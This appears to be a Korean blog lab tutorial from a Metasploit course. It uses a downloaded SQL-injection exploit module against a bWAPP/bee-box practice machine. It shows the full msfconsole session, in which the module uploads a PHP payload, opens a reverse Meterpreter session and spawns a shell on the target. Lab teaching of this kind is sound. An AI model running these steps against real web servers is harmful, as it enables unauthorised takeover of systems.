정보보안(구버전)/Metasploit 2019. 1. 30. 21:01

Metasploit - 21. SQL 인젝션을 이용한 제어권 획득

 

 

 본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

[실습 시스템] Kali Linux, Gateway, bWAPP

 

 - bWAPP : 웹 모의해킹을 할 수 있는 공격 타켓 시스템

 

 

 

[실습 단계]

 

스캔 -> bwapp 메타스플로잇 모듈 다운로드 -> bwapp SQL 인젝션 > 악성 코드 업로드 실시 -> beebox 제어권 획득

 

 

Ex1) 'bwapp-sqli.rb' 다운로드

 

@bwapp-sqli.rb 다운로드.txt


 

root@kali:~# wget https://raw.githubusercontent.com/naiduv/codecrawl/master/code/bwapp-sqli.rb

 

root@kali:~# ls
Desktop    Downloads  Pictures  Ransomware  Videos 
Documents  Music      Public    Templates   bwapp-sqli.rb

 

root@kali:~# cp bwapp-sqli.rb /usr/share/metasploit-framework/modules/exploits/multi/http/bwapp-sqli.rb

 

 

 

Ex2) msfconsol 실행

 

root@kali:~# msfconsole -q

msf > 

msf > search bwapp


Matching Modules

================


   Name                           Disclosure Date  Rank       Description

   ----                           ---------------  ----       -----------

   exploit/multi/http/bwapp-sqli                   excellent  bWAPP Sql Injection 



msf > use exploit/multi/http/bwapp-sqli

msf exploit(multi/http/bwapp-sqli) > 


msf exploit(multi/http/bwapp-sqli) > show options


Module options (exploit/multi/http/bwapp-sqli):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   PASSWORD   bug              no        Password to authenticate with

   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]

   RHOST                       yes       The target address

   RPORT      80               yes       The target port (TCP)

   SSL        false            no        Negotiate SSL/TLS for outgoing connections

   TARGETURI  /bWAPP/          yes       Base bWAPP directory path

   USERNAME   bee              yes       Username to authenticate with

   VHOST                       no        HTTP server virtual host



Exploit target:


   Id  Name

   --  ----

   0   Automatic



msf exploit(multi/http/bwapp-sqli) > set rhost 192.168.20.205
rhost => 192.168.20.205

msf exploit(multi/http/bwapp-sqli) > exploit

[*] Started reverse TCP handler on 192.168.20.50:4444 
[*] Payload uploaded to images/QB.php
[*] Sending stage (37543 bytes) to 192.168.20.205
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.205:38625) at 2019-01-30 23:08:32 +0900

meterpreter > 
meterpreter > shell
Process 8012 created.
Channel 0 created.
pwd
/var/www/bWAPP/images

uname -a
Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686 GNU/Linux

Background channel 0? [y/N]  y
meterpreter > 
qmeterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.20.205 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(multi/http/bwapp-sqli) > quit
root@kali:~# 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


Metasploit - 제1장 메타스플로잇 (metaspliot)   

 

 

 
Posted by 김정우 강사(카카오톡 : kim10322)
,


Q